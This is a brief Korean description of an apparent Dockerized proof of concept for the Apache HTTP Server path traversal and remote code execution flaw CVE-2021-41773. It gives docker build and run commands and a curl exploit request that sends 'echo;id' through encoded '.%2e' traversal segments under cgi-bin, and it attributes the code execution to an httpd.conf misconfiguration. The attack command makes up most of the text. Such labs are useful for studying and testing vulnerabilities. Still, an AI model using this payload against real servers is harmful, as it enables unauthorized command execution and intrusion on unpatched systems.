
Dockerized Apache HTTP Server 경로 탐색 및 RCE(CVE-2021-41773) 개념 증명으로, 빌드 지침과 curl 기반 악용 단계를 포함합니다.
$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
httpd.conf 파일의 설정 오류와 Path traversal이 결합되어 RCE 발생
